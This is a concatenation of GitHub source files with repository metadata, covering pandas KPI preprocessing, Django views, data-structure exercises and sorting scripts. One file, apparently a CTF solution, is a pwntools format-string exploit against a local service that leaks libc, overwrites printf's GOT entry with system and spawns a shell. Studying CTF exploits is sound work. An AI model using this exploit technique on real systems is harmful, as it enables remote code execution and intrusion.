] | permissive | will-mccarty/pyradmon | 8209a6055d1dbf21345c7fc7cdfd6e39bd6c1058 | 983b3562f251b7ef30ad405152e8095c34db47a5 | refs/heads/master | 2021-10-13T12:57:31.488695 | 2018-02-14T17:38:52 | 2018-02-14T17:38:52 | 23,162,074 | 0 | 2 | Apache-2.0 | 2021-10-15T12:41:47 | 2014-08-20T19:54:40 | Python | UTF-8 | Python | false | false | 831 | py | #!/usr/bin/env python
# DummyMP - Multiprocessing Library for Dummies!
# Copyright 2014 Albert Huang.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# DummyMP Library - Version Submodule
# multiprocessing library for dummies!
# (library for easily running functions in parallel)
#
global __version__
__version__ = "0.5b1"
| [
"alberthrocks@users.noreply.github.com"
] | alberthrocks@users.noreply.github.com |
15d540e7867223e3960efe65c50fb3381de9921c | f9de76468c160386deab995ddc7fb41c85ea3592 | /src/preprocess.py | e279f1f4a30e5bae77e0f8ee3a544d41e1944412 | [] | no_license | tdrei/kpi-web-app-streamlit | 1a7f73c1b027ad100a1561a10418ca011a80f43f | c1d2c78a105cfa758a721d0f22d56edf95ee7d8e | refs/heads/master | 2023-04-02T16:27:09.342870 | 2021-04-09T15:53:37 | 2021-04-09T15:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,977 | py | import datetime as dt
import logging
import logging.config
from pathlib import Path
from typing import Any, Dict
import numpy as np
import pandas as pd
from sqlalchemy import create_engine
import data_dicts
LOGGING_CONFIG = (Path(__file__).parent.parent / "logging.conf").absolute()
logging.config.fileConfig(fname=LOGGING_CONFIG, disable_existing_loggers=False)
logger = logging.getLogger("preprocessLogger")
SERVER = "JES2010HA01\\HA01,57226"
DB_NAME = "KF_CORE"
def connect_to_engine(server: str, db_name: str) -> Any:
"""Assemble a connection string, connect to the db engine and
return a connection object.
"""
con_string = f"mssql+pyodbc://@{server}/{db_name}?driver=SQL Server"
engine = create_engine(con_string)
connection = engine.connect()
return connection
def read_query(file_path: str, n_years_back: int = 3) -> str:
"""Open the sql-query file, parse and return the query while
replacing the placeholder with the value of the n years
you want to get the data back for (defaults to 3).
"""
with open(file_path, "r", encoding="utf-8-sig") as file:
query = file.read()
query = query.replace("@n_years_back", str(n_years_back))
return query
def create_df(query, connection):
"""Read the data from the db and return a dataframe with
correct datatpyes (is `decimal` for value column).
"""
result = connection.execute(query).fetchall()
df = pd.DataFrame(result, columns=result[0].keys())
# df["value"] = pd.to_numeric(df["value"], errors="raise", downcast="float")
return df
def create_calculation_date_column(df: pd.DataFrame) -> pd.DataFrame:
"""Replace the `period_value`with a "calculation date" that is
set to the last day of the same month. (Note: this is not equal
to the actual calculation date as defined in the DB.)
"""
df["period_value"] = pd.to_datetime(df["period_value"], format="%Y%m")
df["period_value"] = df["period_value"].apply(lambda x: _get_last_day_of_month(x))
return df.rename(columns={"period_value": "calculation_date"},)
def _get_last_day_of_month(some_date):
"""Return date of last day of the same month for a datetime object."""
next_month = some_date.replace(day=28) + dt.timedelta(
days=4
) # this will never fail
return next_month - dt.timedelta(days=next_month.day)
def trim_strings(df: pd.DataFrame) -> pd.DataFrame:
"""Trim whitespace from right end of every string in the dataframe."""
df = df.applymap(lambda x: x.strip() if isinstance(x, str) else x)
return df
def get_rid_of_invalid_entries(df: pd.DataFrame) -> pd.DataFrame:
"""Some entries are created by IT and do not show actual values or have
to be (temporarily) removed for other reasons.
"""
df = df[~df["product_name"].str.startswith("Reserviert IT")]
# TODO: Temporarily exlcude this KPI, wrong Mandant names, no valid entity level
df = df[df["kpi_name"] != "NCAs: Anzahl Antraege Completed Total"]
return df
def prettify_kpi_names(df: pd.DataFrame) -> pd.DataFrame:
"""Cosmetics. Note: Replacing parantheses is a pain ..."""
df["kpi_name"] = df["kpi_name"].str.replace("gueltig", "gültig")
df["kpi_name"] = (
df["kpi_name"]
.str.replace("(", "")
.str.replace(")", "")
.str.replace(" Monatl.", "")
)
return df
def add_mandant_sector_level_columns(df: pd.DataFrame) -> pd.DataFrame:
"""Look-up `mandant` and `sector` values from the PRODUCT_LOOK_UP
dict (in the `data_dicts` module.) and crate new columns. Raise
when there is a KeyError. Also create a `level` column with all
values set to '3' (-> 'prodcut level'). Return transformed df.
"""
try:
df["mandant"] = df["product_name"].apply(
lambda x: data_dicts.PRODUCT_LOOK_UP[x]["mandant"]
)
df["sector"] = df["product_name"].apply(
lambda x: data_dicts.PRODUCT_LOOK_UP[x]["sector"]
)
except KeyError as e:
print(f"Loaded product not in PRODUCT_LOOK_UP. LOOK_UP has to be updated!: {e}")
df["level"] = 3
# Sanity check
if df.isna().sum().sum() != 0:
raise AssertionError(
"Ups, something went wrong: NaN values in df, please check!"
)
return df
def create_max_date_dict(df: pd.DataFrame) -> Dict[str, pd.Timestamp]:
"""Return a dict with each unique `product_name` as key and
the last month it appeared in as value. (This is necessary for
correcting the full expansion of the dataframe in a later step.)
"""
df_max_date = df[["product_name", "calculation_date"]].copy()
df_max_date.sort_values(["product_name", "calculation_date"], inplace=True)
df_max_date.drop_duplicates(subset="product_name", keep="last", inplace=True)
dict_max_date_per_entity = {e: d for e, d in df_max_date.itertuples(index=False)}
return dict_max_date_per_entity
def expand_dataframe_fully(df: pd.DataFrame) -> pd.DataFrame:
"""Expand the dataframe to have a complete time series of
`calculation_date` for each possible kpi, agg_level, profile combi.
Non-existent `value` entries get a NaN entry. (This step is necessary
to ensure correct difference calculation for the values in later
stages - because in rare cases it is possible that some entities
get no value for certain months. See old dev notebook's appendix for
details on this issue.)
"""
months = pd.DataFrame(
{"calculation_date": sorted(df["calculation_date"].unique()), "merge_col": 0}
)
# All but `calculation_date` and `value`
rest = df.drop(["calculation_date", "value"], axis=1).drop_duplicates()
rest["merge_col"] = 0
temp_tbl = months.merge(rest, how="outer", on="merge_col")
temp_tbl = temp_tbl.drop(columns={"merge_col"})
temp_tbl = temp_tbl.sort_values(["kpi_id", "calculation_date"])
df = temp_tbl.merge(
df,
how="left",
on=[
"calculation_date",
"kpi_id",
"kpi_name",
"period_id",
"product_name",
"cardprofile",
"mandant",
"sector",
"level",
],
).reset_index(drop=True)
# Sanity check
if df.shape[0] / len(df.groupby(["product_name", "kpi_name"]).groups.keys()) != 37:
raise AssertionError(
"In case you did not load 3 years, something went wrong, please check!"
)
return df
def reduce_dataframe_to_max_date_per_entity(
df: pd.DataFrame, dict_max_date_per_entity: Dict[str, pd.Timestamp]
) -> pd.DataFrame:
"""For each entity drop all rows for calculation_dates that are
larger than it's max date before the full expansion. So we make sure
to display entities only that still exist(ed) at any point in time.
"""
for entity, date_ in dict_max_date_per_entity.items():
df.drop(
df.loc[
(df["product_name"] == entity) & (df["calculation_date"] > date_)
].index,
inplace=True,
)
return df
def create_new_mandant_level_rows(df: pd.DataFrame) -> pd.DataFrame:
"""Retrun a dataframe with the aggregated values on MANDANT level.
Add and fill the necessary columns so that it can be merged with the
product level values (the original input df) later on.
"""
df_g = df.groupby(
["calculation_date", "kpi_id", "kpi_name", "period_id", "mandant", "sector"]
)["value"].sum().reset_index()
df_g["product_name"] = df_g["mandant"] + " - Total"
df_g["cardprofile"] = "all"
df_g["level"] = 2
df_g = df_g.reindex(df.columns, axis=1)
# Sanity Check
if df_g["value"].sum() != df["value"].sum():
raise AssertionError("Ups, something went wrong, please check.")
return df_g
def create_new_sector_level_rows(df: pd.DataFrame) -> pd.DataFrame:
"""Retrun a dataframe with the aggregated values on SECTOR level.
Add and fill the necessary columns so that it can be merged with the
product level values (the original input df) later on.
"""
df_g = df.groupby(
["calculation_date", "kpi_id", "kpi_name", "period_id", "sector"]
)["value"].sum().reset_index()
df_g["mandant"] = df_g["sector"]
df_g["product_name"] = df_g["sector"] + " - Total"
df_g["cardprofile"] = "all"
df_g["level"] = 1
df_g = df_g.reindex(df.columns, axis=1)
# Sanity Check
if df_g["value"].sum() != df["value"].sum():
raise AssertionError("Ups, something went wrong, please check.")
return df_g
def create_new_overall_level_rows(df: pd.DataFrame) -> pd.DataFrame:
"""Retrun a dataframe with the aggregated values on OVERALL level.
Add and fill the necessary columns so that it can be merged with the
product level values (the original input df) later on.
"""
df_g = df.groupby(
["calculation_date", "kpi_id", "kpi_name", "period_id"]
)["value"].sum().reset_index()
df_g["mandant"] = "BCAG"
df_g["sector"] = "BCAG"
df_g["product_name"] = df_g["sector"] + " - Total"
df_g["cardprofile"] = "all"
df_g["level"] = 0
df_g = df_g.reindex(df.columns, axis=1)
# Sanity Check
if df_g["value"].sum() != df["value"].sum():
raise AssertionError("Ups, something went wrong, please check.")
return df_g
def concatenate_all_levels(
df: pd.DataFrame,
df_mandant: pd.DataFrame,
df_sector: pd.DataFrame,
df_overall: pd.DataFrame,
) -> pd.DataFrame:
"""Return a concactenated dataframe with all levels. """
return pd.concat([df, df_mandant, df_sector, df_overall], ignore_index=True)
def add_avg_value_column(df):
"""Add an 'value_avg' column where the total value is divided
by the 'Aktive Konten' of the respective product-date combination.
If 'Aktive Konten' is missing, fill with np.nan.
"""
df_grouped = df.groupby(["calculation_date", "product_name"], sort=False)
df_w_avg = df_grouped.apply(_calc_avg_value)
# Sanity Check
assert df_w_avg.iloc[:, :-1].equals(df), "Uups, something went wrong."
return df_w_avg
def _calc_avg_value(df_chunk):
"""Return the respective groupby chunk with a new avg column.
(This is called within `add_avg_value_column`.)
"""
try:
n_active = float(
df_chunk[df_chunk["kpi_name"] == "Anzahl aktive Konten Total"]
["value"].values[0]
)
df_chunk["value_avg"] = (
(pd.to_numeric(df_chunk["value"], errors="raise", downcast="float") + 0.001)
/ n_active
)
except IndexError:
df_chunk["value_avg"] = np.nan
return df_chunk
def sort_and_drop_kpi_id(df: pd.DataFrame) -> pd.DataFrame:
"""Return a properly sorted df (important for the later aggregation
of period values!) and then drop the `kpi_id`. It won't be used
no more.
"""
df = df.sort_values(
[
"kpi_id",
"level",
"mandant",
"product_name",
"cardprofile",
"calculation_date",
]
)
df.drop(columns=["kpi_id"], inplace=True)
return df
def save_to_csv(df: pd.DataFrame):
"""Save two copies of the dataframe: The 'working' file that is
overwriting the old data and will be overwritten next month. And
a copy that will be permanently stored in the "history" folder.
"""
df.to_csv("./data/preprocessed_results.csv", index=False)
# History copy with yearmon_str in name
end_date = df["calculation_date"].max()
yearmon_str = str(end_date.date().strftime('%Y-%m'))
df.to_csv(f"./data/history/{yearmon_str}_preprocessed_results.csv", index=False)
def validate_and_log_results(df: pd.DataFrame):
"""Get some dataframe stats and compare some of them to expected
values in the PREPROCESS_VALIDATION dict. If unexpected values
are found, log warnings. (It might well be that the expected values
in the dict have to be updated if the changes are desired.) Logging
happens to console and the file `preprocessing.log`.
"""
nunique_list = [f"- {col}: {df[col].nunique()}" for col in list(df.columns)[:-1]]
nunique_str = "\n".join(nunique_list)
nan_list = [f"- {col}: {df[col].isnull().sum()}" for col in list(df.columns)]
nan_str = "\n".join(nan_list)
cols_exp = data_dicts.PREPROCESS_VALIDATION["cols"]
cols_act = list(df.columns)
mandant_exp = sorted(data_dicts.PREPROCESS_VALIDATION["mandant"])
mandant_act = sorted([val for val in df["mandant"].unique()])
profile_exp = sorted(data_dicts.PREPROCESS_VALIDATION["cardprofile"])
profile_act = sorted(
[val for val in df["cardprofile"].unique() if isinstance(val, str)]
)
agg_level_id_exp = sorted(data_dicts.PREPROCESS_VALIDATION["level"])
agg_level_id_act = sorted([val for val in df["level"].unique()])
period_id_exp = sorted(data_dicts.PREPROCESS_VALIDATION["period_id"])
period_id_act = sorted([val for val in df["period_id"].unique()])
n_period_exp = data_dicts.PREPROCESS_VALIDATION["n_period"]
n_period_act = df["calculation_date"].nunique()
# Log infos
logger.info(f"LOG FOR PERIOD: {df['calculation_date'].max()}")
logger.info(
"# of unique values per (relevant) column in processed df:\n"
f"{nunique_str}"
)
logger.info("# of NaN values per column in processed df:\n" f"{nan_str}")
logger.info(f"Total rows in dataset: {len(df):,.0f}")
# Log warnings
if not cols_exp == cols_act:
logger.warning(
f"\nData cols not as expected!\n"
f" Expected columns are:\n {cols_exp}\n"
f" Actual columns are:\n {cols_act}\n"
)
if not n_period_exp == n_period_act:
logger.warning(
f"\n# of unique periods not as expected!\n"
f" Expected: {n_period_exp}, Actual: {n_period_act}\n\n"
)
if not mandant_exp == mandant_act:
logger.warning(
f"\nMandant values not as expected!\n"
f" Expected mandants are:\n {mandant_exp}\n"
f" Actual mandants are:\n {mandant_act}\n"
)
if not profile_exp == profile_act:
logger.warning(
f"Card profile values not as expected!\n"
f" Expected profiles are:\n {profile_exp}\n"
f" Actual profiles are:\n {profile_act}\n"
)
if not agg_level_id_exp == agg_level_id_act:
logger.warning(
f"Agg_level_id values not as expected!\n"
f" Expected agg_level_ids are:\n {agg_level_id_exp}\n"
f" Actual agg_level_ids are:\n {agg_level_id_act}\n"
)
if not period_id_exp == period_id_act:
logger.warning(
f"Period_id values not as expected!\n"
f" Expected period_ids are:\n {period_id_exp}\n"
f" Actual period_ids are:\n {period_id_act}\n"
)
def main(server, db_name):
logger.info("Start preprocessing ...")
connection = connect_to_engine(server, db_name)
query = read_query("sql_statements/get_results_for_kpi_sheet.sql", n_years_back=3)
df = create_df(query, connection)
df = create_calculation_date_column(df)
df = trim_strings(df)
df = get_rid_of_invalid_entries(df)
df = prettify_kpi_names(df)
df = add_mandant_sector_level_columns(df)
dict_max_date_per_entity = create_max_date_dict(df)
df = expand_dataframe_fully(df)
df = reduce_dataframe_to_max_date_per_entity(df, dict_max_date_per_entity)
df_mandant = create_new_mandant_level_rows(df)
df_sector = create_new_sector_level_rows(df)
df_overall = create_new_overall_level_rows(df)
df = concatenate_all_levels(df, df_mandant, df_sector, df_overall)
df = add_avg_value_column(df)
df = sort_and_drop_kpi_id(df)
save_to_csv(df)
validate_and_log_results(df)
logger.info("Preprocessing complete!\n\n")
if __name__ == "__main__":
main(SERVER, DB_NAME)
| [
"r2d4@bluewin.ch"
] | r2d4@bluewin.ch |
128f10fc37c8c1906277ae9126eb1a2336fccdae | 83734e45db81fc69aa360c25ffd7feb93080d855 | /user/views.py | b3d6cb19084c7c21d7305a3f9ee71d328d76390e | [] | no_license | xiaoShuZhou/FreeTechHub-API | d410e785ef4a7abe49011bb6731c752b100a38bf | f0522f965b7f3f1fa45ef5504f46112c949058dd | refs/heads/master | 2022-12-26T11:51:24.608670 | 2020-07-27T03:26:51 | 2020-07-27T03:26:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | from .models import User
from .serializers import UserSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import viewsets
from .serializers import UserSerializer
from .models import User
from rest_framework.permissions import IsAuthenticated
# Create your views here.
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all()
serializer_class = UserSerializer
permission_classes = [
IsAuthenticated,
]
class GetSelfView(APIView):
"""
get the request user model
"""
def get_object(self, pk):
try:
return User.objects.get(pk=pk)
except User.DoesNotExist:
raise Http404
def get(self, request, format=None):
user = self.get_object(request.user.id)
serializer = UserSerializer(user)
return Response(serializer.data)
| [
"47469275+JasonWurunfei@users.noreply.github.com"
] | 47469275+JasonWurunfei@users.noreply.github.com |
0f708cd53d211f89b1ba3db099c9e0a1a8fed082 | ff04c16daddfeab5cf7904bb75f52d0a3a68267e | /WebBoard_Project/manage.py | 47116f3702060ed091f41f1052720dcf60932b95 | [] | no_license | Akshita07/WebBoard_Project | 701fa9bc0df62f246e16e64fe5b700f623c75bba | 44f1e09e5961414eed16e298187c49070e3a38ee | refs/heads/master | 2022-11-03T18:46:18.528896 | 2019-06-16T07:00:36 | 2019-06-16T07:00:36 | 192,040,646 | 0 | 1 | null | 2022-10-07T20:56:22 | 2019-06-15T05:29:12 | Python | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WebBoard_Project.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"36688304+Akshita07@users.noreply.github.com"
] | 36688304+Akshita07@users.noreply.github.com |
bd31c23a53fffacd0638580ff9cb7e3786df9c48 | 172a56b41939aaff16dbe6b00fe85b714c5b1d3a | /algos/dequeues.py | b8c2d34f9a0a7e57ecdcd39768af60fc5c37909b | [] | no_license | jacindaz/algos_practice | cdb3e990afdc847f18d9d37fee79bbad09f406f5 | 94c23f014f676880217fde41498b92111d0f8fc7 | refs/heads/master | 2020-05-05T12:15:44.812923 | 2019-09-21T16:15:06 | 2019-09-21T16:15:06 | 180,020,598 | 0 | 0 | null | 2019-09-27T04:26:11 | 2019-04-07T20:34:20 | Python | UTF-8 | Python | false | false | 1,032 | py | class Dequeue(object):
def __init__(self, items=[]):
self._items = items
def add_front(self, item):
"""front is index -1 of a list"""
self._items.append(item)
def add_rear(self, item):
self._items.insert(0, item)
def remove_front(self):
return self._items.pop()
def remove_rear(self):
return self._items.pop(0)
def is_empty(self):
return self._items == []
def size(self):
return len(self._items)
def is_palindrome(string):
dequeue = Dequeue([char for char in string])
result = False
while not dequeue.is_empty():
if dequeue.size() == 1:
return True
else:
front = dequeue.remove_front()
rear = dequeue.remove_rear()
if front == rear:
result = True
elif (front is None and rear is not None) or (front is not None and rear is None):
result = True
else:
return False
return result
| [
"jacinda.zhong@cloverhealth.com"
] | jacinda.zhong@cloverhealth.com |
23cef0d0894c76d3618a6ac02c0255f82d0eda72 | f000604ff605cf07acd338c8ecc293db327fe5ff | /2017/njctf/Pingme/test.py | b86d1299c0dc76e40b30bdbc99f75441b9c54b1a | [] | no_license | SteinsGatep001/CTFs | e7316b989bc5170f3e4aba83b027053179353341 | 921747c53261c4fbb4c91fb975fb35f46c952ff5 | refs/heads/master | 2021-07-13T01:42:47.327855 | 2019-01-22T10:25:14 | 2019-01-22T10:25:14 | 105,667,649 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,028 | py | from pwn import *
import sys
#context.log_level = 'debug'
#context.arch = 'amd64'
elf = ELF('./vuln32_fmt')
#io = process('./vuln32_fmt')
def exec_fmt(payload):
io = remote('127.0.0.1', 2333)
io.send(payload);
data = io.recv()
return data
def leak_fmt_off():
auto_fmt = FmtStr(exec_fmt)
print auto_fmt.offset
#payload = fmtstr_payload(auto_fmt.offset,
def vdump_proc():
vuln_start_addr = 0x8048000
fp_dump = open('proc.dump', 'ab+')
leakfunc_offset = 0
while True:
io = remote('127.0.0.1', 2333)
padd_str = '%' + str(13) + '$s'
padd_str = padd_str.ljust(8, 'a') + p32(vuln_start_addr+leakfunc_offset)
io.send(padd_str)
try:
data = io.recvuntil('aaa')[:-3]
except EOFError:
print hex(leakfunc_offset)
sys.exit(0)
data += '\x00'
leakfunc_offset += len(data)
fp_dump.write(data)
fp_dump.flush()
io.close()
fp_dump.close()
io = remote('127.0.0.1', '2333')
main_func_addr = 0x80484CB
printf_got = 0x804A010
read_got = 0x804A00C
def mleak_ping(lk_address):
padd_str = '%13$saaa' + p32(lk_address)
io.send(padd_str)
leaked_data = io.recvuntil('aaa')[:-3]
io.clean()
return leaked_data
def vexp(system_addr):
raw_input('continue?')
payload = fmtstr_payload(11, {printf_got : system_addr})
io.send(payload)
io.sendline('/bin/sh')
io.interactive()
read_addr = u32(mleak_ping(read_got)[:4])
print 'read address:', hex(read_addr)
printf_addr = u32(mleak_ping(printf_got)[:4])
print 'printf address:', hex(printf_addr)
raw_input('leak 2 functions??')
base_addr_m = printf_addr & 0xFFFFF000
libc_base_addr = 0
while True:
leaked_data = mleak_ping(base_addr_m)
if len(leaked_data) >= 4:
if '\x7fELF' in leaked_data:
print 'libc_base:', hex(base_addr_m)
break
base_addr_m -= 0x1000
raw_input('real start?')
system_addr = base_addr_m + 0x3ada0
vexp(system_addr)
io.close()
| [
"dead0x01@gmail.com"
] | dead0x01@gmail.com |
bf80d9381a2d8dd59805d935f62d71588ff64f50 | 4a62a3d9cd2288346aac244f70384223a5ab75a8 | /MergeByAddress.py | eec0a8d27fb3f8ef619fe14f40e386097eee03e1 | [
"Apache-2.0"
] | permissive | murphyd2/NYCSpillsGeocoding | 035c836d4f1e9327486dff6a326b8b39f07827ae | 806035701a22a26f2fc9b2d9a1e1b66d9cb2992d | refs/heads/master | 2020-03-23T06:08:48.286649 | 2018-08-31T20:44:30 | 2018-08-31T20:44:30 | 141,191,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | "Dylan Murphy"
"2018-07-12"
"This program attempts to take a csv file. create a dictonary with the building numbers as the keys. merge sort the keys and then create a sorted list of addresses by placing the values for that key [the whole address] at that index"
class Id:
def __init__(self,borough, block, lot, numbers, spaced_numbers, letters, BBL, x, y, E_des):
self.borough = borough
self.block= block
self.lot= lot
self.numbers=numbers
self.spaced_numbers= spaced_numbers
self.letters=letters
self.BBL=BBL
self.x=x
self.y=y
self.E_des= E_des
def __repr__(self):
return repr((self.borough, self.block, self.lot, self.numbers,self.spaced_numbers, self.letters, self.BBL, self.x,self.y,self.E_des))
def mergeSort(alist):
# print("Splitting ",alist)
if len(alist)>1:
mid = len(alist)//2
lefthalf = alist[:mid]
righthalf = alist[mid:]
mergeSort(lefthalf)
mergeSort(righthalf)
i=0
j=0
k=0
while i < len(lefthalf) and j < len(righthalf):
if lefthalf[i].letters < righthalf[j].letters: #because its omparing ASCII values of the characters, a would be lower than z (97 < 122)
alist[k]=lefthalf[i]
i=i+1
else:
alist[k]=righthalf[j]
j=j+1
k=k+1
while i < len(lefthalf):
alist[k]=lefthalf[i]
i=i+1
k=k+1
while j < len(righthalf):
alist[k]=righthalf[j]
j=j+1
k=k+1
# print("Merging ",alist)
def WriteTo(linelist, outfile):
"""writes the sorted list to a CSV file with name outfile"""
file = open(str(outfile),'w')
i=0
for line in linelist:
file.write(linelist[i].borough+ ',')
file.write(linelist[i].block+ ',')
file.write(linelist[i].lot+ ',')
file.write(linelist[i].numbers+ ',')
file.write(linelist[i].spaced_numbers+ ',')
file.write(linelist[i].letters+ ',')
file.write(linelist[i].BBL+ ',')
file.write(linelist[i].x+ ',')
file.write(linelist[i].y+ ',')
file.write(linelist[i].E_des)
i+=1
file.close()
def main():
file = open("MN_PLUTO_SORTED.csv",'r')
data= file.readlines()
file.close()
pointer=0
linedict={} #effectively an enumerate of every line {"line+ str(intger)": <Id object>}
lineList=[] #list of Id objects
for line in data:
Drew= "line"+str(pointer)
fields=line.split(',')
i=0
for item in fields:
WhoseLine= Id(fields[i],fields[i+1],fields[i+2],fields[i+3],fields[i+4],fields[i+5].upper(),fields[i+6],fields[i+7],fields[i+8],fields[i+9])
pointer+=1
linedict[Drew]=WhoseLine
lineList.append(WhoseLine)
#UnsortedList= linedict.values()
#UnsortedList is a list containing Id objects
# i=0
# for item in lineList:
# print(lineList[i].numbers)
mergeSort(lineList)
WriteTo(lineList,"MN_PLUTO__ALPHA_SORTED.csv")
# i=0
# for item in lineList:
# print(lineList[i].numbers)
# i+=1
main() | [
"noreply@github.com"
] | murphyd2.noreply@github.com |
0dc9999349bb21967e1e99e4910b150adfb3724f | 2b7ce5b5d5329069b50187fbd1bf7f3522463b76 | /first_site/catalog/admin.py | c2c7092c98220cad34bb8d5bf23ca20d2c7b7404 | [] | no_license | MisterHedgehog/python_django | 7a702c8ee4ef3a31d5fa7488e869626665ef7b9a | 120dad6909c96b944bb34a8ba9f2b02023dea551 | refs/heads/master | 2020-04-12T10:53:11.775661 | 2019-03-14T12:52:05 | 2019-03-14T12:52:05 | 162,443,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | from .models import Brand, Item, Comment, Notebook, SmartPhone, ComputingDevice, Photo, Tablet, Profile, Clothes
from django.contrib import admin
admin.site.register(Item)
admin.site.register(Brand)
admin.site.register(Comment)
admin.site.register(Notebook)
admin.site.register(SmartPhone)
admin.site.register(ComputingDevice)
admin.site.register(Photo)
admin.site.register(Tablet)
admin.site.register(Profile)
admin.site.register(Clothes)
| [
"andreivoltwin@gmail.com"
] | andreivoltwin@gmail.com |
83d7d27064e446b28ac14be52db8debb3eb29dca | 61d54b5d4e4329bf830a5b88ac75a3d9a0b00ecc | /blog/form.py | 940833cca4affb253c9878332efcacfa54dfcf13 | [] | no_license | majd21/django-blog | 7d34ac6f2b04173677077e693c94b46ce9a08482 | 315bbbb0fdc86974e7bc3033961ba3f5a87be8f8 | refs/heads/main | 2023-02-07T08:15:26.185675 | 2020-12-28T07:39:13 | 2020-12-28T07:39:13 | 324,224,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from .models import Blogs ,Comments
from django.forms import ModelForm
class BlogForm(ModelForm):
class Meta:
model = Blogs
fields = ['title' , 'body' , 'image']
class CommentForm(ModelForm):
class Meta:
model = Comments
fields = ['name' , 'body'] | [
"majidn9877@gamil.com"
] | majidn9877@gamil.com |
2e9229b24034579de5a50820f63ba0a844cc8d76 | 765b765c7b25cd9e6fa7513794a639ecbd210c95 | /powerapi/test_utils/__init__.py | 582930c5a980fc9c881f27d276ff8838ca81f53b | [
"BSD-3-Clause",
"Python-2.0",
"Apache-2.0"
] | permissive | PierreRustOrange/powerapi | 80df09dc72bf248a999216a9f5e0a167b8ea4e5e | 400ee58d3dc9f3bb6706b12571cb10afd8a91787 | refs/heads/master | 2022-02-13T06:15:22.576416 | 2021-10-28T12:01:17 | 2021-10-28T12:01:17 | 244,576,648 | 0 | 0 | BSD-3-Clause | 2020-03-03T08:05:07 | 2020-03-03T08:05:06 | null | UTF-8 | Python | false | false | 1,569 | py | # Copyright (c) 2021, INRIA
# Copyright (c) 2021, University of Lille
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| [
"arthur.d-azemar@inria.fr"
] | arthur.d-azemar@inria.fr |
a71eaf902c6b63983c91e8caf7675b99dd64e78b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/303/80291/submittedfiles/testes.py | f8fdf8b73bca451bb6d4e647f3f675e329669678 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
n= int(input('Digite um numero:'))
if n%3==0 and n%7==0:
print(' O numero é divisivel por 3 e por 7')
else:
print(' o numero nao é divisivel por 3 e por 7')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
5aa4013e18747fac74f0b474293fbfca4050e3d6 | 9da129ec93a6fd2c5f65b57a0faec21d8eb80720 | /Term_NSI/devoirs/4-dm2/Corrigé/S0/Non finis/E13-Plan_de_mtro.py | 526fa706fe6287af13575f935f94756983389b78 | [] | no_license | FranckCHAMBON/ClasseVirtuelle | 79bd4e4114d27ca3792b46b1fb384c394397b329 | 48fe9883ee6763e79e561537bc0ed7048339b457 | refs/heads/master | 2022-08-22T15:35:48.128508 | 2021-04-28T07:21:04 | 2021-04-28T07:21:04 | 249,953,475 | 3 | 4 | null | 2022-08-05T09:28:10 | 2020-03-25T10:52:47 | HTML | UTF-8 | Python | false | false | 889 | py | """
Nom: PALAZON
Prénom: Anabel
Prologin: Qualification 2003
Exercice: 13 - Plan de métro
https://prologin.org/train/2003/semifinal/plan_de_metro
"""
def nb_intermédiaires (liste : list, nb_couples : int) -> int :
""" Renvoie le nombre de stations intermédiaires par lesquelles il faut passer pour aller vers la station la plus éloignée.
>>> nb_couples = 14
>>> liste = [[1,3], [3,42], [42,57], [57,270], [42,566], [566,245], [245,556], \
[556,924], [924,516], [556,432], [556,461], [461,640], [640,632], [432,589]]
7
"""
if nb_couples == 1 :
return 1
